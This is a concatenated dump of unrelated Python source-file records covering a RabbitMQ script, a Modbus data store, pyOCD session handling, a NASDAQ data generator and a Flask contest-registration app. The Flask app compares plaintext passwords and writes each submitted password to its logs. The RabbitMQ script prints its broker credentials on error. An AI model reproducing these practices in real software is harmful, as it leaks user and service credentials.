channel.queue_bind(exchange=exchange_name, queue=input_queue, routing_key=input_binding_key)\n\n if debug:\n print(\"Bound to pika queue.\")\n\n # Create a callback method to handle incoming messages\n channel.basic_consume(processmessage, queue=input_queue, no_ack=True)\n channel.start_consuming()\n\nexcept KeyboardInterrupt:\n connection.close()\n print(\"Script Exited\")\n\nexcept pika.exceptions.ConnectionClosed:\n print(\"Unable to connect to AMQP broker. The connection timed out.\")\n print(\"Input Binding Key: \" + input_binding_key)\n print(\"Input Queue: \" + input_queue)\n print(\"Output Binding Key: \" + output_binding_key)\n print(\"Trace ID: \" + trace_id)\n print(\"Exchange Name: \" + exchange_name)\n print(\"Rabbit User Name: \" + rabbit_username)\n print(\"Rabbit Password: \" + rabbit_password)\n print(\"Broker IP: \" + amqp_broker)\n print(\"Broker Port: \" + str(amqp_port))\n print(\"Debug Flag: \" + str(debug))\n print(\"Threshold Value: \" + str(threshold_value))","sub_path":"threshold_demo/thresholdapp.py","file_name":"thresholdapp.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616361169","text":"# -*- coding: utf-8 -*-\n\nimport socket\nimport struct\n\nfrom threading import Lock, Thread\n\nclass DataBank:\n\n \"\"\" Data class for thread safe access to bits and words space \"\"\"\n\n bits_lock = Lock()\n bits = [False] * 0x10000\n words_lock = Lock()\n words = [0] * 0x10000\n\n @classmethod\n def get_bits(cls, address, number=1):\n with cls.bits_lock:\n if (address >= 0) and (address + number <= len(cls.bits)):\n return cls.bits[address: number + address]\n else:\n return None\n\n @classmethod\n def set_bits(cls, address, bit_list):\n with cls.bits_lock:\n if (address >= 0) and (address + len(bit_list) <= len(cls.bits)):\n cls.bits[address: address + len(bit_list)] = bit_list\n return True\n else:\n return None\n\n @classmethod\n def get_words(cls, address, number=1):\n with cls.words_lock:\n if (address >= 0) and (address + number <= len(cls.words)):\n return cls.words[address: number + address]\n else:\n return None\n\n @classmethod\n def __get_word(cls, address): # with no lock, internal function\n if (address >= 0) and (address <= len(cls.words)):\n return cls.words[address]\n else:\n return None\n\n @classmethod\n def set_words(cls, address, word_list):\n with cls.words_lock:\n if (address >= 0) and (address + len(word_list) <= len(cls.words)):\n cls.words[address: address + len(word_list)] = word_list\n return True\n else:\n return None\n\n @classmethod\n def __set_word(cls, address, word):\n if (address >= 0) and (address <= len(cls.words)):\n cls.words[address] = word\n return True\n else:\n return None\n\n @classmethod\n def set_words_v2(cls, address, word_list):\n with cls.words_lock:\n if (address >= 0) and (address + len(word_list) <= len(cls.words)):\n index = 0\n for new_word in word_list:\n current_address = address + index\n old_word = cls.__get_word(current_address)\n if new_word == old_word:\n continue\n else:\n cls.__set_word(current_address, new_word)\n index += 1\n return True\n else:\n return None\n","sub_path":"data_source.py","file_name":"data_source.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578494564","text":"from typing import List\n\n\nclass Solution:\n def countCharacters(self, words: List[str], chars: str) -> int:\n s = 0\n\n stock = self.stom(chars)\n\n for w in words:\n usage = self.stom(w)\n good = True\n for i, c in usage.items():\n if i not in stock or stock[i] < c:\n good = False\n break\n if good:\n s += len(w)\n\n return s\n\n def stom(self, s):\n stock = {}\n for c in s:\n if c not in stock:\n stock[c] = 0\n stock[c] += 1\n\n return stock\n\n\nprint(Solution().countCharacters([\"cat\",\"bt\",\"hat\",\"tree\"], \"atach\"))\nprint(Solution().countCharacters(words = [\"hello\",\"world\",\"leetcode\"], chars = \"welldonehoneyr\"))","sub_path":"leetcode/char_stock.py","file_name":"char_stock.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155911569","text":"# -*- coding:utf-8 -*-\nimport os,sys,csv\n\nsys.path.append(\"/share/WebSite/\")\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"WebSite.settings\")\n\nfrom django.contrib.auth.models import User as AuthUser\nfrom User import models as UserModels\n\nclass User(object):\n \"\"\"docstring for App\"\"\"\n def __init__(self):\n self.users = self._read()\n \n def _read(self):\n users = []\n for user in AuthUser.objects.all():\n try:\n UserModels.UserInfo.objects.get(user = user)\n except:\n users.append(user)\n print(\"user info read finish\")\n return users\n\n def _store(self):\n for user in self.users:\n try:\n institution = UserModels.Institution.objects.get(name=\"北京希望组\")\n except:\n institution = UserModels.Institution(\n name = \"北京希望组\",\n description = \"未定义\"\n )\n institution.save()\n userinfo = UserModels.UserInfo(\n user = user,\n institution = institution,\n title = '未定义'\n )\n userinfo.save()\n print(\"user info store finish\")\n def _institution(institution):\n return UserModels.Institution.objects.all()\n","sub_path":"lib/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384493885","text":"from collections import deque\n\n# https://e-maxx.ru/algo/bfs\ndef bws(A, si):\n used = [0] * len(A)\n d = [0] * len(A)\n p = [0] * len(A)\n used[si] = True\n p[si] = -1\n\n q = deque([si])\n while len(q) > 0:\n vert = q.popleft()\n for vi in range(len(A)):\n if vi == vert:\n continue\n if vi == p[vert]:\n continue\n if A[vi] & A[vert] == 0:\n continue\n \n if used[vi] == False:\n used[vi] = True\n q.append(vi)\n d[vi] = d[vert] + 1\n p[vi] = vert\n else:\n # restore paths s -> vi and vert -> s\n cycle = set()\n k = vert\n while k != si:\n cycle.add(k)\n k = p[k]\n k = vi\n while k != si:\n cycle.add(k)\n k = p[k]\n cycle.add(si)\n return cycle\n \n return set()\n\ndef main():\n n = int(input())\n A = list(map(int, input().split()))\n assert n == len(A)\n\n\n A = list(filter(lambda x: x > 0, A))\n n = len(A)\n\n to_check = set(range(n))\n\n res = -1\n while (len(to_check) > 0):\n si = to_check.pop()\n cycle = bws(A, si)\n r = len(cycle)\n if r != 0:\n res = min(res, r) if res != -1 else r\n if res == 3: # bootleg\n print(res)\n return\n #to_check = to_check - cycle\n\n \n print(res)\n\n\nimport sys\ninput = sys.stdin.readline\nif __name__ == \"__main__\":\n main()","sub_path":"580/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436794130","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom models import Document\n\nclass DocumentForm(forms.ModelForm):\n \"\"\"Form for editing a document\"\"\"\n revision = forms.IntegerField(widget=forms.HiddenInput())\n \n class Meta:\n model = Document\n fields = ('subject', 'content')\n widgets = {\n 'subject': forms.TextInput(attrs={'class':'span4'}),\n 'content': forms.Textarea(),\n }\n\nclass VisibilityForm(forms.ModelForm):\n \"\"\"Form for managing visibility option of a document\"\"\"\n class Meta:\n model = Document\n fields = ('visibility',)\n\n\n","sub_path":"wadharkka/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90154169","text":"from __future__ import absolute_import, division, print_function\r\n\r\nimport os\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\n# TensorFlow and tf.keras\r\nimport tensorflow as tf\r\nimport random\r\nimport pandas as pd\r\n\r\n# Helper libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom statsmodels.graphics.tsaplots import plot_acf, plot_pacf\r\n\r\n\r\nclass NasdaqGenerator(object):\r\n\r\n def createTestData_nparray(self, data, seqLength, predLength=1):\r\n i = 0\r\n dataX = []\r\n dataY = []\r\n while (i < (len(data) - seqLength - predLength)):\r\n dataX.append(data[i:i + seqLength])\r\n dataY.append(data[i + seqLength:(i + seqLength + predLength)])\r\n i += predLength\r\n\r\n return np.array(dataX), np.array(dataY)\r\n\r\n def createTrainData_nparray(self, data, seqLength, predLength=1):\r\n i = 0\r\n dataX = []\r\n dataY = []\r\n while (i < (len(data) - seqLength - predLength)):\r\n dataX.append(data[i:i + seqLength])\r\n dataY.append(data[i + seqLength:(i + seqLength + predLength)])\r\n i += 1\r\n\r\n return np.array(dataX), np.array(dataY)\r\n\r\n def normalize(self, data):\r\n numerator = data - np.min(data, 0)\r\n denominator = np.max(data, 0) - np.min(data, 0)\r\n return numerator / (denominator + 1e-7)\r\n\r\n def standardize(self, data):\r\n m = np.mean(data)\r\n stdev = np.std(data)\r\n return (data - m) / stdev\r\n\r\n def deStandardize(self, prevData, currentData):\r\n m = np.mean(prevData)\r\n stdev = np.std(prevData)\r\n return currentData * stdev + m\r\n\r\n def DeNormalize(self, prevData, currentData):\r\n min = np.min(prevData, 0)\r\n denominator = np.max(prevData, 0) - np.min(prevData, 0)\r\n return currentData * denominator + min\r\n\r\n def getMinTimeStep(self, data):\r\n min = data[0].shape[0]\r\n for i in range(len(data)):\r\n if (min > data[i].shape[0]):\r\n min = data[i].shape[0]\r\n return min\r\n\r\n def get_delta(self, Y):\r\n Y_shiftright = np.concatenate(([Y[0]], Y), axis=0)\r\n Y_shiftright = np.delete(Y_shiftright, len(Y) - 1, axis=0)\r\n return np.subtract(Y_shiftright, Y)\r\n\r\n def __init__(self, train_ratio, seq_length, output_count, batch_size):\r\n\r\n nasdaq100_small_raw = pd.read_csv(\r\n filepath_or_buffer=\"D:/Projects/tensor2/NASDAQ100/nasdaq100/small/nasdaq100_padding.csv\")\r\n dataset = []\r\n\r\n for i in range(len(nasdaq100_small_raw.values[0])):\r\n temp = nasdaq100_small_raw.values[:, i]\r\n dataset.append(temp)\r\n dataset = np.stack(dataset, axis=1)\r\n # dataset = np.reshape(dataset, [dataset.shape[0], dataset.shape[1], 1])\r\n print(dataset.shape)\r\n self.dataset = dataset\r\n dataset = np.diff(dataset, axis=0)\r\n plt.plot(dataset[:1000, -1])\r\n plt.show()\r\n plot_acf(dataset[:1000, -1])\r\n plt.show()\r\n\r\n train_size = int(len(dataset) * train_ratio)\r\n train_dataset = dataset[:train_size]\r\n test_dataset = dataset[train_size:]\r\n\r\n self.trainX, self.trainY = self.createTrainData_nparray(train_dataset, seq_length, output_count)\r\n self.testX, self.testY = self.createTestData_nparray(test_dataset, seq_length, output_count)\r\n\r\n self.batch_size = batch_size\r\n self.input_dim = self.trainX.shape[1:] # dimension of inputs\r\n self.output_dim = self.trainY.shape[1:]\r\n\r\nif __name__ == \"__main__\":\r\n a = NasdaqGenerator(0.8, 64, 8, 16)\r\n","sub_path":"DataCookers/NASDAQ100dataset.py","file_name":"NASDAQ100dataset.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"634441439","text":"from sardana.macroserver.macro import Macro, Type\nimport time\nimport taurus\n\nclass get_oav_iba_beam(Macro):\n \"\"\"Save fitted oav iba beam in bl13 variables\"\"\"\n \n def run(self):\n oav_iba = taurus.Device('bl13/eh/oav-01-iba')\n bl13vars = taurus.Device('bl13/ct/variables')\n \n if oav_iba.XProjFitConverged and oav_iba.YProjFitConverged:\n XProjFitCenter = oav_iba.XProjFitCenter\n YProjFitCenter = oav_iba.YProjFitCenter\n XProjFitFWHM = oav_iba.XProjFitFWHM\n YProjFitFWHM = oav_iba.YProjFitFWHM\n # Center should be relative to center not to the origin\n # Because changing zoom should not\n else:\n self.warning('beam not fitted')\n","sub_path":"ALBA_BL13_XALOC_USER_MACROS/oav_iba.py","file_name":"oav_iba.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601693928","text":"# pyOCD debugger\n# Copyright (c) 2018-2020 Arm Limited\n# SPDX-License-Identifier: Apache-2.0\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport logging.config\nimport six\nimport yaml\nimport os\nimport weakref\n\n# inspect.getargspec is deprecated in Python 3.\ntry:\n from inspect import getfullargspec as getargspec\nexcept ImportError:\n from inspect import getargspec\n\nfrom . import exceptions\nfrom .options_manager import OptionsManager\nfrom ..board.board import Board\nfrom ..utility.notification import Notifier\n\nLOG = logging.getLogger(__name__)\n\n## @brief Set of default config filenames to search for.\n_CONFIG_FILE_NAMES = [\n \"pyocd.yaml\",\n \"pyocd.yml\",\n \".pyocd.yaml\",\n \".pyocd.yml\",\n ]\n\n## @brief Set of default user script names to search for.\n_USER_SCRIPT_NAMES = [\n \"pyocd_user.py\",\n \".pyocd_user.py\",\n ]\n\nclass Session(Notifier):\n \"\"\"! @brief Top-level object for a debug session.\n \n This class represents a debug session with a single debug probe. It is the root of the object\n graph, where it owns the debug probe and the board objects.\n \n Another important function of this class is that it contains a dictionary of session-scope\n options. These would normally be passed in from the command line. Options can also be loaded\n from a config file.\n\n Precedence for session options:\n \n 1. Keyword arguments to constructor.\n 2. _options_ parameter to constructor.\n 3. Probe-specific options from a config file.\n 4. General options from a config file.\n 5. _option_defaults_ parameter to constructor.\n \n The session also tracks several other objects:\n - @ref pyocd.gdbserver.gdbserver.GDBServer \"GDBServer\" instances created for any cores.\n - @ref pyocd.probe.tcp_probe_server.DebugProbeServer \"DebugProbeServer\".\n - The user script proxy.\n \n See the @ref pyocd.core.helpers.ConnectHelper \"ConnectHelper\" class for several methods that\n make it easy to create new sessions, with or without user interaction in the case of multiple\n available debug probes. A common pattern is to combine @ref \n pyocd.core.helpers.ConnectHelper.session_with_chosen_probe()\n \"ConnectHelper.session_with_chosen_probe()\" and a **with** block.\n \n A Session instance can be used as a context manager. The session will, by default, be\n automatically opened when the context is entered. And, of course, it will be closed when the\n **with** block is exited (which is harmless if the session was never opened). If you wish to\n disable automatic opening, set the `auto_open` parameter to the constructor to False. If an\n exception is raised while opening a session inside a **with** statement, the session will be\n closed for you to undo any partial initialisation.\n \"\"\"\n \n ## @brief Weak reference to the most recently created session.\n _current_session = None\n \n @classmethod\n def get_current(cls):\n \"\"\"! @brief Return the most recently created Session instance or a default Session.\n \n By default this method will return the most recently created Session object that is\n still alive. If no live session exists, a new default session will be created and returned.\n That at least provides access to the user's config file(s).\n \n Used primarily so code that doesn't have a session reference can access session options. This\n method should only be used to access options that are unlikely to differ between sessions,\n or for debug or other purposes.\n \"\"\"\n if cls._current_session is not None:\n return cls._current_session()\n else:\n return Session(None)\n\n def __init__(self, probe, auto_open=True, options=None, option_defaults=None, **kwargs):\n \"\"\"! @brief Session constructor.\n \n Creates a new session using the provided debug probe. Session options are merged from the\n _options_ parameter and any keyword arguments. Normally a board instance is created that can\n either be a generic board or a board associated with the debug probe.\n \n Note that the 'project_dir' and 'config' options must be set in either keyword arguments or\n the _options_ parameter.\n \n Passing in a _probe_ that is None is allowed. This is useful to create a session that operates\n only as a container for session options. In this case, the board instance is not created, so the\n #board attribute will be None. Such a Session cannot be opened.\n \n @param self\n @param probe The @ref pyocd.probe.debug_probe. \"DebugProbe\" instance. May be None.\n @param auto_open Whether to automatically open the session when used as a context manager.\n @param options Optional session options dictionary.\n @param option_defaults Optional dictionary of session option values. This dictionary has the\n lowest priority in determining final session option values, and is intended to set new\n defaults for option if they are not set through any other method.\n @param kwargs Session options passed as keyword arguments.\n \"\"\"\n super(Session, self).__init__()\n \n Session._current_session = weakref.ref(self)\n \n self._probe = probe\n self._closed = True\n self._inited = False\n self._user_script_namespace = None\n self._user_script_proxy = None\n self._delegate = None\n self._auto_open = auto_open\n self._options = OptionsManager()\n self._gdbservers = {}\n self._probeserver = None\n \n # Set this session on the probe, if we were given a probe.\n if probe is not None:\n probe.session = self\n \n # Update options.\n self._options.add_front(kwargs)\n self._options.add_back(options)\n \n # Init project directory.\n if self.options.get('project_dir') is None:\n self._project_dir = os.getcwd()\n else:\n self._project_dir = os.path.abspath(os.path.expanduser(self.options.get('project_dir')))\n LOG.debug(\"Project directory: %s\", self.project_dir)\n \n # Apply common configuration settings from the config file.\n config = self._get_config()\n probesConfig = config.pop('probes', None)\n self._options.add_back(config)\n\n # Pick up any config file options for this board.\n if (probe is not None) and (probesConfig is not None):\n for uid, settings in probesConfig.items():\n if str(uid).lower() in probe.unique_id.lower():\n LOG.info(\"Using config settings for probe %s\" % (probe.unique_id))\n self._options.add_back(settings)\n \n # Merge in lowest priority options.\n self._options.add_back(option_defaults)\n \n # Logging config.\n self._configure_logging()\n \n # Bail early if we weren't provided a probe.\n if probe is None:\n self._board = None\n return\n \n # Load the user script.\n self._load_user_script()\n \n # Ask the probe if it has an associated board, and if not then we create a generic one.\n self._board = probe.create_associated_board() \\\n or Board(self, self.options.get('target_override'))\n \n def _get_config(self):\n # Load config file if one was provided via options, and no_config option was not set.\n if not self.options.get('no_config'):\n configPath = self.find_user_file('config_file', _CONFIG_FILE_NAMES)\n \n if configPath is not None:\n try:\n with open(configPath, 'r') as configFile:\n LOG.debug(\"Loading config from: %s\", configPath)\n config = yaml.safe_load(configFile)\n if not isinstance(config, dict):\n raise exceptions.Error(\"configuration file %s does not contain a top-level dictionary\"\n % configPath)\n return config\n except IOError as err:\n LOG.warning(\"Error attempting to access config file '%s': %s\", configPath, err)\n \n return {}\n \n def find_user_file(self, option_name, filename_list):\n \"\"\"! @brief Search the project directory for a file.\n \n @retval None No matching file was found.\n @retval string An absolute path to the requested file.\n \"\"\"\n if option_name is not None:\n filePath = self.options.get(option_name)\n else:\n filePath = None\n \n # Look for default filenames if a path wasn't provided.\n if filePath is None:\n for filename in filename_list:\n thisPath = os.path.join(self.project_dir, filename)\n if os.path.isfile(thisPath):\n filePath = thisPath\n break\n # Use the path passed in options, which may be absolute, relative to the\n # home directory, or relative to the project directory.\n else:\n filePath = os.path.expanduser(filePath)\n if not os.path.isabs(filePath):\n filePath = os.path.join(self.project_dir, filePath)\n \n return filePath\n \n def _configure_logging(self):\n \"\"\"! @brief Load a logging config dict or file.\"\"\"\n # Get logging config that could have been loaded from the config file.\n config = self.options.get('logging')\n \n # Allow logging setting to refer to another file.\n if isinstance(config, six.string_types):\n loggingConfigPath = self.find_user_file(None, [config])\n \n if loggingConfigPath is not None:\n try:\n with open(loggingConfigPath, 'r') as configFile:\n config = yaml.safe_load(configFile)\n LOG.debug(\"Using logging configuration from: %s\", config)\n except IOError as err:\n LOG.warning(\"Error attempting to load logging config file '%s': %s\", config, err)\n return\n\n if config is not None:\n # Stuff a version key if it's missing, to make it easier to use.\n if 'version' not in config:\n config['version'] = 1\n # Set a different default for disabling existing loggers.\n if 'disable_existing_loggers' not in config:\n config['disable_existing_loggers'] = False\n # Remove an empty 'loggers' key.\n if ('loggers' in config) and (config['loggers'] is None):\n del config['loggers']\n \n try:\n logging.config.dictConfig(config)\n except (ValueError, TypeError, AttributeError, ImportError) as err:\n LOG.warning(\"Error applying logging configuration: %s\", err)\n \n @property\n def is_open(self):\n \"\"\"! @brief Boolean of whether the session has been opened.\"\"\"\n return self._inited and not self._closed\n \n @property\n def probe(self):\n \"\"\"! @brief The @ref pyocd.probe.debug_probe.DebugProbe \"DebugProbe\" instance.\"\"\"\n return self._probe\n \n @property\n def board(self):\n \"\"\"! @brief The @ref pyocd.board.board.Board \"Board\" object.\"\"\"\n return self._board\n \n @property\n def target(self):\n \"\"\"! @brief The @ref pyocd.core.target.soc_target \"SoCTarget\" object representing the SoC.\n \n This is the @ref pyocd.core.target.soc_target \"SoCTarget\" instance owned by the board.\n \"\"\"\n return self.board.target\n \n @property\n def options(self):\n \"\"\"! @brief The @ref pyocd.core.options_manager.OptionsManager \"OptionsManager\" object.\"\"\"\n return self._options\n \n @property\n def project_dir(self):\n \"\"\"! @brief Path to the project directory.\"\"\"\n return self._project_dir\n \n @property\n def delegate(self):\n \"\"\"! @brief An optional delegate object for customizing behaviour.\"\"\"\n return self._delegate\n \n @delegate.setter\n def delegate(self, new_delegate):\n \"\"\"! @brief Setter for the `delegate` property.\"\"\"\n self._delegate = new_delegate\n \n @property\n def user_script_proxy(self):\n \"\"\"! @brief The UserScriptDelegateProxy object for a loaded user script.\"\"\"\n return self._user_script_proxy\n \n @property\n def gdbservers(self):\n \"\"\"! @brief Dictionary of core numbers to @ref pyocd.gdbserver.gdbserver.GDBServer \"GDBServer\" instances.\"\"\"\n return self._gdbservers\n \n @property\n def probeserver(self):\n \"\"\"! @brief A @ref pyocd.probe.tcp_probe_server.DebugProbeServer \"DebugProbeServer\" instance.\"\"\"\n return self._probeserver\n \n @probeserver.setter\n def probeserver(self, server):\n \"\"\"! @brief Setter for the `probeserver` property.\"\"\"\n self._probeserver = server\n \n @property\n def log_tracebacks(self):\n \"\"\"! @brief Quick access to debug.traceback option since it is widely used.\"\"\"\n return self.options.get('debug.traceback')\n\n def __enter__(self):\n assert self._probe is not None\n if self._auto_open:\n try:\n self.open()\n except Exception:\n self.close()\n raise\n return self\n\n def __exit__(self, type, value, traceback):\n self.close()\n return False\n \n def _init_user_script_namespace(self, user_script_path):\n \"\"\"! @brief Create the namespace dict used for user scripts.\n \n This initial namespace has only those objects that are available very early in the\n session init process. For instance, the Target instance isn't available yet. The\n _update_user_script_namespace() method is used to add such objects to the namespace\n later on.\n \"\"\"\n import pyocd\n import pyocd.flash.file_programmer\n self._user_script_namespace = {\n # Modules and classes\n 'pyocd': pyocd,\n 'exceptions': pyocd.core.exceptions,\n 'Error': pyocd.core.exceptions.Error,\n 'TransferError': pyocd.core.exceptions.TransferError,\n 'TransferFaultError': pyocd.core.exceptions.TransferFaultError,\n 'Target': pyocd.core.target.Target,\n 'State': pyocd.core.target.Target.State,\n 'SecurityState': pyocd.core.target.Target.SecurityState,\n 'BreakpointType': pyocd.core.target.Target.BreakpointType,\n 'WatchpointType': pyocd.core.target.Target.WatchpointType,\n 'VectorCatch': pyocd.core.target.Target.VectorCatch,\n 'Event': pyocd.core.target.Target.Event,\n 'RunType': pyocd.core.target.Target.RunType,\n 'HaltReason': pyocd.core.target.Target.HaltReason,\n 'ResetType': pyocd.core.target.Target.ResetType,\n 'MemoryType': pyocd.core.memory_map.MemoryType,\n 'MemoryMap': pyocd.core.memory_map.MemoryMap,\n 'RamRegion': pyocd.core.memory_map.RamRegion,\n 'RomRegion': pyocd.core.memory_map.RomRegion,\n 'FlashRegion': pyocd.core.memory_map.FlashRegion,\n 'DeviceRegion': pyocd.core.memory_map.DeviceRegion,\n 'FileProgrammer': pyocd.flash.file_programmer.FileProgrammer,\n 'FlashEraser': pyocd.flash.eraser.FlashEraser,\n 'FlashLoader': pyocd.flash.loader.FlashLoader,\n # User script info\n '__name__': os.path.splitext(os.path.basename(user_script_path))[0],\n '__file__': user_script_path,\n # Objects\n 'session': self,\n 'options': self.options,\n 'LOG': logging.getLogger('pyocd.user_script'),\n }\n \n def _update_user_script_namespace(self):\n \"\"\"! @brief Add objects available only after init to the user script namespace.\"\"\"\n if self._user_script_namespace is not None:\n self._user_script_namespace.update({\n 'probe': self.probe,\n 'board': self.board,\n 'target': self.target,\n 'dp': self.target.dp,\n 'aps': self.target.aps,\n })\n \n def _load_user_script(self):\n scriptPath = self.find_user_file('user_script', _USER_SCRIPT_NAMES)\n\n if scriptPath is not None:\n try:\n # Read the script source.\n with open(scriptPath, 'r') as scriptFile:\n LOG.debug(\"Loading user script: %s\", scriptPath)\n scriptSource = scriptFile.read()\n \n self._init_user_script_namespace(scriptPath)\n \n scriptCode = compile(scriptSource, scriptPath, 'exec')\n # Executing the code will create definitions in the namespace for any\n # functions or classes. A single namespace is shared for both globals and\n # locals so that script-level definitions are available within the\n # script functions.\n six.exec_(scriptCode, self._user_script_namespace, self._user_script_namespace)\n \n # Create the proxy for the user script. It becomes the delegate unless\n # another delegate was already set.\n self._user_script_proxy = UserScriptDelegateProxy(self._user_script_namespace)\n if self._delegate is None:\n self._delegate = self._user_script_proxy\n except IOError as err:\n LOG.warning(\"Error attempting to load user script '%s': %s\", scriptPath, err)\n\n def open(self, init_board=True):\n \"\"\"! @brief Open the session.\n \n This method does everything necessary to begin a debug session. It first loads the user\n script, if there is one. The user script will be available via the _user_script_proxy_\n property. Then it opens the debug probe and sets the clock rate from the `frequency` user\n option. Finally, it inits the board (which will init the target, which performs the\n full target init sequence).\n \n @param self\n @param init_board This parameter lets you prevent the board from being inited, which can\n be useful in board bringup situations. It's also used by pyocd commander's \"no init\"\n feature.\n \"\"\"\n if not self._inited:\n assert self._probe is not None, \"Cannot open a session without a probe.\"\n assert self._board is not None, \"Must have a board to open a session.\"\n \n # Add in the full set of objects for the user script.\n self._update_user_script_namespace()\n \n self._probe.open()\n self._closed = False\n self._probe.set_clock(self.options.get('frequency'))\n if init_board:\n self._board.init()\n self._inited = True\n\n def close(self):\n \"\"\"! @brief Close the session.\n \n Uninits the board and disconnects then closes the probe.\n \"\"\"\n if self._closed:\n return\n self._closed = True\n\n LOG.debug(\"uninit session %s\", self)\n if self._inited:\n try:\n self.board.uninit()\n self._inited = False\n except:\n LOG.error(\"exception during board uninit:\", exc_info=self.log_tracebacks)\n \n if self._probe.is_open:\n try:\n self._probe.disconnect()\n except:\n LOG.error(\"probe exception during disconnect:\", exc_info=self.log_tracebacks)\n try:\n self._probe.close()\n except:\n LOG.error(\"probe exception during close:\", exc_info=self.log_tracebacks)\n\nclass UserScriptFunctionProxy(object):\n \"\"\"! @brief Proxy for user script functions.\n \n This proxy makes arguments to user script functions optional. \n \"\"\"\n\n def __init__(self, fn):\n self._fn = fn\n self._spec = getargspec(fn)\n \n def __call__(self, **kwargs):\n args = {}\n for arg in self._spec.args:\n if arg in kwargs:\n args[arg] = kwargs[arg]\n self._fn(**args)\n\nclass UserScriptDelegateProxy(object):\n \"\"\"! @brief Delegate proxy for user scripts.\"\"\"\n\n def __init__(self, script_namespace):\n super(UserScriptDelegateProxy, self).__init__()\n self._script = script_namespace\n \n def __getattr__(self, name):\n if name in self._script:\n fn = self._script[name]\n return UserScriptFunctionProxy(fn)\n else:\n raise AttributeError(name)\n","sub_path":"pyocd/core/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":21469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342690598","text":"import random, re, StringIO, csv, datetime\nfrom flask import Flask, render_template, request, redirect, url_for, make_response, send_file\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import login_user, current_user, logout_user\nfrom aioregister.sample_problems import get_sample_problems\nfrom aioregister.school_login import SchoolLogin\nfrom models import db, School, Deleted, Student\nfrom sqlalchemy.ext.automap import automap_base\n\nclass AioRegisterApplication(Flask):\n def __init__(self, *args, **kwargs):\n Flask.__init__(self, __name__, *args, **kwargs)\n with self.open_resource('wordlist.txt') as f:\n self.wordlist = f.read().split()\n with self.open_resource('countries.txt') as f:\n self.countries = f.read().split('\\n')\n\n @self.route('/')\n def index():\n return render_template('index.html', contestlive=self.contest_links_live())\n\n @self.route('/register/', methods=['GET', 'POST'])\n def register():\n if request.method == 'POST':\n \n school = SchoolLogin.get(request.form['username'])\n if school is not None and \\\n (school.school.password == request.form['password'] or \n (school.school.alt_password is not None and school.school.alt_password == request.form['password'])):\n login_user(school, remember=True)\n self.logger.info(\"[Auth] Sucessful login for '%s' with password '%s'\", request.form['username'], request.form['password'])\n else:\n self.logger.info(\"[Auth] Unucessful login for '%s' with password '%s'\", request.form.get('username','UNSPECIFIED'), request.form.get('password','UNSPECIFIED'))\n return render_template('register_login.html', badlogin=True)\n if (current_user.is_authenticated()):\n school = current_user.school\n students = Student.query.filter_by(school_id=school.id).order_by(Student.division, Student.id)\n return render_template('register.html',\n school=school,\n studentInfo=[\"First Name\", \"Last Name\", \"Username\", \"Password\", \"Year\", \"Gender\", \"Email\", \"Division\"],\n students=students,\n contestlive=self.contest_links_live())\n else:\n return render_template('register_login.html')\n\n @self.route('/sample/')\n def sample():\n return render_template('sample_problems.html', sample_problems=get_sample_problems())\n\n @self.route('/testenv/')\n def test_contest_environment():\n return render_template('test_contest_environment.html')\n\n @self.route('/logout/')\n def logout():\n if current_user.is_authenticated():\n self.logger.info('[AUTH] Logout for user %s', current_user.school.username)\n else:\n self.logger.info('[AUTH] Logout for unauthenticated user')\n logout_user()\n return redirect(url_for('index'))\n\n @self.route('/register/student//edit/', methods=['GET', 'POST'])\n def editstudent(studentid):\n if not current_user.is_authenticated():\n return notauthenticated()\n # ensure student exists and that user has permissions to view student\n student = Student.query.filter_by(id=studentid).first()\n if student is None or student.school_id != current_user.school.id:\n return \"Not your student, or student doesn't exist. Please go back.\"\n\n if request.method == 'POST':\n params = {}\n params['firstname'] = request.form.get('firstname', '').strip()\n params['lastname'] = request.form.get('lastname', '').strip()\n params['year'] = request.form.get('year', '')\n params['gender'] = request.form.get('gender', '')\n params['email'] = request.form.get('email', '').strip()\n params['division'] = request.form.get('division', '')\n if not (params['firstname']):\n return render_template('editstudent.html', message=\"First name must be defined\", **params)\n if not (params['lastname']):\n return render_template('editstudent.html', message=\"Last name must be defined\", **params)\n if not (params['year'] and params['year'].isdigit and int(params['year']) >= 1 and int(params['year']) <= 12):\n return render_template('editstudent.html', message=\"Year must be a number between 1 and 12\", **params)\n if not (params['gender'] and len(params['gender']) == 1 and params['gender'] in 'UFM'):\n return render_template('editstudent.html', message=\"Gender must be chosen from the drop down menu\", **params)\n if not (params['division'] and len(params['division']) == 1 and params['division'] in 'IS'):\n return render_template('editstudent.html', 